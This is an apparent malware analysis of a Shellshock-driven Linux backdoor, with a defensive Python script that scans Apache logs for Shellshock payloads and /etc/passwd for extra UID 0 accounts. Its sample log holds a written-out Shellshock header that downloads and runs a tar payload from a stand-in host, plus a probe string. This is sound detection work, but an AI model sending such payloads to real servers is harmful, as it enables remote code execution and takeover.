This backdoor was discovered while digging through Apache logs for Shellshock exploitation attempts and inspecting the malicious payloads associated with them. The attack first exploits CVE-2014-6271 (Shellshock, the bash bug that executes commands trailing a function definition passed in an environment variable) to download a tar archive onto the target, then extracts its contents under /tmp. The extracted script xcron.sh is then run; it looks for /lib/libpcprofile.so on the system and attempts to exploit CVE-2013-2094 (a local privilege escalation in the Linux kernel's perf_event_open handling, affecting kernels before 3.8.9) to gain root. If that exploit succeeds, the software adds a root account to the system and installs SSH keys, giving the attacker remote root login. The attack originated from an IP address in Germany, but strings in the backdoor scripts suggest the software is of Romanian origin.
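As an added example (not code from the original write-up), the Python script below shows the two checks an analyst would run against this chain: it parses Apache combined-format access log lines, looks for a Shellshock payload in the request line, Referer or User-Agent, extracts the command that follows the function body, and flags which of the stages described above the payload matches (wget/curl download, drop under /tmp, tar extraction, xcron.sh); it also scans /etc/passwd content for the extra UID 0 account the backdoor installs. The log lines, the passwd entries, the "sysadm" user name and the 198.51.100.9 download host are constructed sample data, not indicators from this attack.

```python
import re
from dataclasses import dataclass
from typing import List

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
# Apache escapes embedded quotes as \", so the quoted fields allow backslash escapes.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# CVE-2014-6271: bash parses "() { ... }" out of an environment variable as a
# function definition and keeps executing whatever follows it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Follow-on stages described in the write-up, matched against the trailing command.
STAGE_RES = {
    "download": re.compile(r'\b(?:wget|curl)\b'),
    "tmp_drop": re.compile(r'/tmp\b'),
    "untar": re.compile(r'\btar\b'),
    "xcron": re.compile(r'xcron\.sh'),
}

# Constructed sample log lines (documentation-range IPs, made-up download host).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2014:10:03:11 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'cd /tmp; wget http://198.51.100.9/x.tar; tar xf x.tar; sh xcron.sh'"
198.51.100.23 - - [25/Sep/2014:10:04:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [25/Sep/2014:10:05:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.37.0"
"""

# Constructed /etc/passwd content; "sysadm" is a made-up name for the planted account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sysadm:x:0:0::/root:/bin/bash
"""


@dataclass
class Hit:
    host: str
    time: str
    request: str
    source: str         # which logged field carried the payload
    payload: str        # commands after the function body
    stages: List[str]   # follow-on stages the payload matches


def extract_payload(value: str) -> str:
    """Return the command string that follows the '() { ... };' function body."""
    m = SHELLSHOCK_RE.search(value)
    if not m:
        return ""
    end = value.find('};', m.end())
    return value[end + 2:].strip() if end != -1 else value[m.end():].strip()


def scan_log(text: str) -> List[Hit]:
    """Parse combined-format lines and return every Shellshock hit with its stages."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a full triage would count and report these
        for source in ("request", "referer", "agent"):
            value = m.group(source)
            if SHELLSHOCK_RE.search(value):
                payload = extract_payload(value)
                stages = [name for name, rx in STAGE_RES.items() if rx.search(payload)]
                hits.append(Hit(m.group("host"), m.group("time"),
                                m.group("request"), source, payload, stages))
    return hits


def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Return user names with UID 0 other than root (the persistence described above)."""
    names = []
    for line in passwd_text.splitlines():
        parts = line.split(':')
        if len(parts) >= 3 and parts[2] == '0' and parts[0] != 'root':
            names.append(parts[0])
    return names


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h.time} {h.host} {h.source}: {h.payload!r} stages={h.stages}")
    print("extra UID 0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
```

On a real host, feed the script the contents of the access log and /etc/passwd; a hit with all four stages matched is the full chain described above, while a bare "echo" payload is the probe that typically precedes it. The script does not check authorized_keys, which should be reviewed by hand on any host where the UID 0 check fires.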
Created: 2026-02-23
Indicators: none found.